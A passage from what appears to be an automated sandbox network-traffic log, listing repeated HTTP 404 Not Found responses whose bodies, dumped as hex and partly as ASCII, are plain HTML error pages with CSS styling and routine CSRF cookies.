74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 20 Nov 2024 15:54:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 20 Nov 2024 15:54:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 20 Nov 2024 15:54:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 20 Nov 2024 15:54:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B827006D5FA5D2A668DF1F10DD85BD93FC0BBDD41A6C8C715597A37B800Set-Cookie: _csrf=6963693ee978f7dbcf6789af428e22034f771aa8755334f418a640c97d4b0001a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Wbx2eb7MF_6Z_AlYJ8nKV6VYQRuXr8sy%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 37 74 70 2d 6f 73 63 50 47 33 44 34 70 70 6b 47 37 4b 71 63 77 4f 58 62 5f 48 30 36 7a 69 68 77 6b 36 58 64 6f 67 42 34 30 73 51 32 52 48 49 37 6e 34 4c 49 49 57 39 72 44 35 45 38 38 59 71 53 61 38 42 75 71 4c 64 62 76 69 54 48 4f 49 75 2d 6a 6d 51 4d 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 20 Nov 2024 15:54:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B75C737181E93405B8B6E7D403579FA221C236A49ABA5DB34E05FC7A000Set-Cookie: _csrf=0aedfcd0a726c28ce4593cd026a05c19164dc103a2daf8dad6c6579bc87ae7a8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-zILHEb-FCz4YVLUD1zZFDXRE4cDKPb7%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 49 67 47 39 38 41 5f 59 66 35 41 6f 6b 33 6c 57 45 54 76 61 37 59 5a 55 5a 31 6c 72 7a 50 65 7a 44 79 61 4a 4b 36 56 7a 64 71 39 38 6b 2d 37 69 48 6f 44 30 77 62 68 4e 39 45 42 45 71 4d 2d 38 69 67 72 78 79 50 72 61 34 79 4a 43 50 6c 67 35 63 57 76 37 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 20 Nov 2024 15:54:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BB4D9C1893174E3A86C5B2AFB2C366A92626823D50195A73132817DB500Set-Cookie: _csrf=1dc6e3e4752f1f5082c624de0e81e29f08d017db963d6af5630ae806ab97175fa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22AR96HRKOhNqODEGFZ5tSKAZZk2ZA1DHS%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 43 67 38 47 37 78 4c 50 71 6d 4e 45 4f 42 69 38 74 48 68 58 58 33 4d 68 59 38 37 4e 58 78 4e 37 45 6a 56 38 36 51 41 76 30 35 31 65 67 55 74 39 42 6c 31 35 75 56 65 6b 53 32 32 6c 4b 59 62 4a 5f 6e 78 33 48 42 30 4a 68 65 48 65 6f 2d 79 6c 55 54 33 48 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 20 Nov 2024 15:54:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BF3C869D8A38C0AD14EBD5F51889EF053DE6C9A48D7104F63C9051A1100Set-Cookie: _csrf=16f98d3123ce523e4b6654e1ce653129825bbe36aabd52dd62556e36999a4286a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22X0A_Klrpmg-h2YkptVVKLhKE1qKyXIJj%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 4b 56 4c 66 34 4c 35 35 70 65 55 46 36 36 62 58 46 43 64 69 33 33 58 4e 34 6a 6d 72 63 32 75 63 32 2d 57 30 50 62 77 74 71 6a 63 6c 51 6f 67 79 5a 57 55 35 5f 6c 77 67 5f 4e 75 43 66 62 37 43 59 46 68 77 36 72 46 68 75 74 43 48 74 32 70 72 72 6e 38 77 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 